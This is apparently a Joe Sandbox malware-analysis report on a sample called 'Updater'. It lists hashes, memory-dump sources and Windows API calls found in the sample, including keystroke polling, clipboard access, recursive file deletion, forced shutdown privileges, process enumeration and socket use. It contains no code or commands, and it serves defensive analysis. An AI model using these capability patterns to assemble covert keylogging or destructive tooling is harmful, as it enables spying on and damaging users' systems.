                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3218304859-0
                                                                                                                                                    • Opcode ID: 236f72a90c8045aabce499ee6fa3ec8dfabea6c0c1b0923a333e3294883202d5
                                                                                                                                                    • Instruction ID: ac03691b37be8c491d9e7b60bc806df3b25145ea7e39c21e441b4b5076d6c3f3
                                                                                                                                                    • Opcode Fuzzy Hash: 236f72a90c8045aabce499ee6fa3ec8dfabea6c0c1b0923a333e3294883202d5
                                                                                                                                                    • Instruction Fuzzy Hash: 3B026371604200AFC714DF28C495E2ABBE5EF49314F5884ADF48ADF2A2DB35ED45CB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B8AABD
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B8AB3E
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B8AB59
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B8AB73
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B8AB88
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B8ABA0
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00B8ABB2
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B8ABCA
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00B8ABDC
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B8ABF4
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B8AC06
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 7b91dac5fa079bf41a118ed7b75d4ffb7e5bfff1d041d32653881ebcbfde0fe2
                                                                                                                                                    • Instruction ID: 2f7e93c6a7c1563340e15ca5ce1d256f8137389ae6e9029735f021bb24bcd1c7
                                                                                                                                                    • Opcode Fuzzy Hash: 7b91dac5fa079bf41a118ed7b75d4ffb7e5bfff1d041d32653881ebcbfde0fe2
                                                                                                                                                    • Instruction Fuzzy Hash: 3D41D8206047CA6EFF35676489447A5BEE1EB11304F0840DBD5C6475D1EBE499C4CB63
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B975BD
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9760E
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9763A
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B97651
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B97678
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
                                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 409396820-2428617273
                                                                                                                                                    • Opcode ID: c9c01659bf00721c56fe5094cb8a7b068352d57a2b656e4a53792f762fb952f6
                                                                                                                                                    • Instruction ID: adb3f12801540a898821d098fff54cec19397beec5e03d027441189f994877a1
                                                                                                                                                    • Opcode Fuzzy Hash: c9c01659bf00721c56fe5094cb8a7b068352d57a2b656e4a53792f762fb952f6
                                                                                                                                                    • Instruction Fuzzy Hash: BFA15A72518254AFC710EFA4D885DAFB7ECEF84700F0049ADF589C6191EB34DA09CB62
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                    • Opcode ID: 2c889fcb3877fd1e2b362c4bfe66e4ede54e7b3b9d97a8a8e20d075cb0636e92
                                                                                                                                                    • Instruction ID: 4af4fd2d777c10fe86e465d94c4e8b5cac4ca5f1b1ab8686070dc8a04d7da0e4
                                                                                                                                                    • Opcode Fuzzy Hash: 2c889fcb3877fd1e2b362c4bfe66e4ede54e7b3b9d97a8a8e20d075cb0636e92
                                                                                                                                                    • Instruction Fuzzy Hash: 3141BE30205652AFDB10CF15E888F25BBE0EF45328F15C1A9E45ACB762DB79ED42CB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B8E1C0
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B8E1FD
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B8E24D
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8E25E
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B8E275
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B8E27E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                    • Opcode ID: d9b34bf45d5d2de4f61665f81b4481b878c5964f345c6a438393c43a44b1deab
                                                                                                                                                    • Instruction ID: b9b1ee1fbf3ffab292425efbe2fa76ba72663f1ad293f7319af63a1a0956a513
                                                                                                                                                    • Opcode Fuzzy Hash: d9b34bf45d5d2de4f61665f81b4481b878c5964f345c6a438393c43a44b1deab
                                                                                                                                                    • Instruction Fuzzy Hash: 913161310083969FC705EF64D8958AFB7E8BE95310F404EBDF4E9921A1EB24DA09CB52
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B827D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
                                                                                                                                                      • Part of subcall function 00B827D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
                                                                                                                                                      • Part of subcall function 00B827D9: GetLastError.KERNEL32 ref: 00B82860
                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00B8F7AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                    • Opcode ID: b93b8f5c83602be6e10f63932a920c2b59b0f603bb67ecfa939785d29f06665f
                                                                                                                                                    • Instruction ID: b51f5e4b33696fe82ed8e5e812408d97a14dd6378470c83f20bb837b9bad9118
                                                                                                                                                    • Opcode Fuzzy Hash: b93b8f5c83602be6e10f63932a920c2b59b0f603bb67ecfa939785d29f06665f
                                                                                                                                                    • Instruction Fuzzy Hash: 5501F27A651226ABF7243264AC89BBAB3DCD704750F5405B2FC02E31F2EA644C40C3A0
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                    • Opcode ID: 65b0f60e195b137507acce911153b61abfeab884bc774494b967131515bd0347
                                                                                                                                                    • Instruction ID: cb80f4cc53a063b0ec8509f55d116e758327dde4f60696d2851eb86fc0023729
                                                                                                                                                    • Opcode Fuzzy Hash: 65b0f60e195b137507acce911153b61abfeab884bc774494b967131515bd0347
                                                                                                                                                    • Instruction Fuzzy Hash: A9C24C71E046298FDB69CE28DD407EAB7F5EB48306F1441EAD85DE7240E774AE898F40
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00BA2E97
                                                                                                                                                      • Part of subcall function 00B9F035: GetWindowRect.USER32(?,?), ref: 00B9F04D
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00BA2EC1
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00BA2EC8
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,?,?), ref: 00BA2EFA
                                                                                                                                                      • Part of subcall function 00B8F7F5: Sleep.KERNEL32 ref: 00B8F86D
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00BA2F26
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BA2F84
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                                    • Opcode ID: c6b8f904717a5fea6695bf126b4933838bbbfc6c3ca5bedaade115b5b54afaa9
                                                                                                                                                    • Instruction ID: a347efde4e59937b502c38136df63bd7bf12bb4689168c42e434105810c82669
                                                                                                                                                    • Opcode Fuzzy Hash: c6b8f904717a5fea6695bf126b4933838bbbfc6c3ca5bedaade115b5b54afaa9
                                                                                                                                                    • Instruction Fuzzy Hash: 5C31D472508306AFD720DF14D849FABB7E9FF89314F00091AF589A7191DB75E909CB92
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B880BE
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B880F4
                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B88105
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B88187
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                    • Opcode ID: 8a47f2a3c3e9a8a988fd4b26f35b58139f8bb07290552d189eab0be1b374a898
                                                                                                                                                    • Instruction ID: 75b0752aa3ab86375eabe4d593e33c74a979777b8e32eee5a4c54323035d6188
                                                                                                                                                    • Opcode Fuzzy Hash: 8a47f2a3c3e9a8a988fd4b26f35b58139f8bb07290552d189eab0be1b374a898
                                                                                                                                                    • Instruction Fuzzy Hash: C5415E71600204EFDB05EF54C889A9A7BF9EF48710F5481ADE905AF225DFB1E941CBA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B9A6BB
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B9A6EB
                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B9A7B8
                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B9A7CE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 2693929171-438819550
                                                                                                                                                    • Opcode ID: f12ec9c49dc42d548b356e578088f15ac46a23080dea65cb83af2ad40956c2b0
                                                                                                                                                    • Instruction ID: 03b768c56c0de3caa5b85f57cb620aac4f5b5bdcf0ddb35ad3b17f26f901dce9
                                                                                                                                                    • Opcode Fuzzy Hash: f12ec9c49dc42d548b356e578088f15ac46a23080dea65cb83af2ad40956c2b0
                                                                                                                                                    • Instruction Fuzzy Hash: B641527194021AAFCF14DFA4D94AAEEBBF4EF05310F1441B5E819A3191EB349E84CF91
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00BA3B94: inet_addr.WSOCK32(?), ref: 00BA3BC5
                                                                                                                                                      • Part of subcall function 00BA3B94: _wcslen.LIBCMT ref: 00BA3BE4
                                                                                                                                                      • Part of subcall function 00BA3B94: htons.WSOCK32(00000000), ref: 00BA3C2D
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BA2437
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00BA245E
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00BA24B5
                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00BA24C0
                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00BA24EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesockethtonsinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1501050944-0
                                                                                                                                                    • Opcode ID: 75134b0ad4012818eac82ccd0426cade67183549840558ffe1a475fbf48e7254
                                                                                                                                                    • Instruction ID: 7d7b2e50f5be408b6df30c05331fd9c2767bfd77b5d0a5337049dba81c3ea11e
                                                                                                                                                    • Opcode Fuzzy Hash: 75134b0ad4012818eac82ccd0426cade67183549840558ffe1a475fbf48e7254
                                                                                                                                                    • Instruction Fuzzy Hash: 7751B375A00220AFD710EF24D896F2AB7E4EF49714F1481D8F9099F393DA75AD41CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B8E2D0
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B8E2DE
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B8E2FE
                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00B8E376
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B8E3BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2000298826-0
                                                                                                                                                    • Opcode ID: 00379d93f818e59ff075e8f0297e2c6fe6d8be98fb3aa4f6468374a99767e65c
                                                                                                                                                    • Instruction ID: 464655855bc7d9d05744de80c52ea7737ce7ea9528f8e5910117312e09c8c319
                                                                                                                                                    • Opcode Fuzzy Hash: 00379d93f818e59ff075e8f0297e2c6fe6d8be98fb3aa4f6468374a99767e65c
                                                                                                                                                    • Instruction Fuzzy Hash: DE31AC711083019FC301EFA4D885AAABBF8EF89340F4409BDF596871A1EBB0DD49CB52
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                    • Opcode ID: f8d5e03a1ac11e53489678efd7252ad6c769c7a9e7c0b9dce0efdc73945369e5
                                                                                                                                                    • Instruction ID: 63189ed74cde4afbad3ea3dd5078f4b333e0ae8f83d7459a7ef85ccdcb2e6d3a
                                                                                                                                                    • Opcode Fuzzy Hash: f8d5e03a1ac11e53489678efd7252ad6c769c7a9e7c0b9dce0efdc73945369e5
                                                                                                                                                    • Instruction Fuzzy Hash: 2921D1357002115FE7319F16C854BAB7BE8FF64318F5580A9E40A8B652CBB5ED82CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B820D4
                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B820E0
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B820EF
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B820F6
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B8210C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 0644427ac385ce1543f147e748d8eeb8845c3f3d82ff3a2c54bf032bf169e4e8
                                                                                                                                                    • Instruction ID: 2f738ba88007c26d6caa771bc9f282cbbf91e3b0c12167b13d062aafe3c0a3b8
                                                                                                                                                    • Opcode Fuzzy Hash: 0644427ac385ce1543f147e748d8eeb8845c3f3d82ff3a2c54bf032bf169e4e8
                                                                                                                                                    • Instruction Fuzzy Hash: D3F062B5100301ABDB112F64DC4EF563BADEF89760F600524FA45E7261DEB5DC00CB60
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00B5B9AF
                                                                                                                                                      • Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A
                                                                                                                                                    • GetTimeZoneInformation.KERNEL32 ref: 00B5B9C1
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,00BF21DC,000000FF,?,0000003F,?,?), ref: 00B5BA39
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,00BF2230,000000FF,?,0000003F,?,?,?,00BF21DC,000000FF,?,0000003F,?,?), ref: 00B5BA66
